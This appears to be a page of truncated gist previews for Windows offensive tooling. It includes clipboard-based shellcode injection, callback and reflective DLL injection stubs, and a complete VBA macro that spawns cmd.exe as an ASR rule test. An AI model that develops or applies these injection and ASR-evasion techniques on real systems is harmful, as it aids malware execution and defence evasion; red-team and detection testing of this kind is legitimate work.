| #define _CRT_SECURE_NO_WARNINGS | |
| #include <iostream> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| typedef struct _PS_ATTRIBUTE { | |
| ULONG Attribute; | |
| SIZE_T Size; | |
| union { |
| // Using the clipboard as your code cave. | |
| // Generate your shellcode with msfvenom or whatever | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs | |
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace ClippySCInject | |
| { |
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| //Resource: https[:]//vx-underground.org/papers.html -> Windows VX -> INJECTION -> Win32 Callback Injection (Author(s): Dreamer && Clover) | |
| namespace Callback_Inject | |
| { | |
| class Program | |
| { |
| //===============================================================================================// | |
| // This is a stub for the actual functionality of the DLL. | |
| //===============================================================================================// | |
| #include "ReflectiveLoader.h" | |
| #include <stdio.h> | |
| // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are | |
| // defined in the project properties (Properties->C++->Preprocessor) so that we can specify our own | |
| // DllMain and use the LoadRemoteLibraryR() API to inject this DLL. |
| #include <stdint.h> | |
| #include <inttypes.h> | |
| #include <winsock2.h> | |
| #include <windns.h> | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <tlhelp32.h> | |
| ' ASR rules bypass: creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| ' Baseline case: starts cmd.exe as a child process of the macro host through | |
| ' WScript.Shell.Run. Going by the Sub's name and the references above, this is the | |
| ' launch that the ASR child-process rule is expected to block, so it works as a | |
| ' control when verifying on a test machine that the rule is enforced. | |
| ' NOTE(review): the rule's mode (block vs. audit) is not shown here; confirm it | |
| ' before treating a successful launch as a gap in the rule itself. | |
| Sub ASR_blocked() | |
| ' Declared as Object, so the shell is late-bound and needs no project reference. | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| ' Run gets only the command string; no window-style or wait argument is passed. | |
| ' For defenders: the host-application -> cmd.exe parent/child pair is what | |
| ' process-creation telemetry would record for this call. | |
| WSHShell.Run "cmd.exe" | |
| End Sub |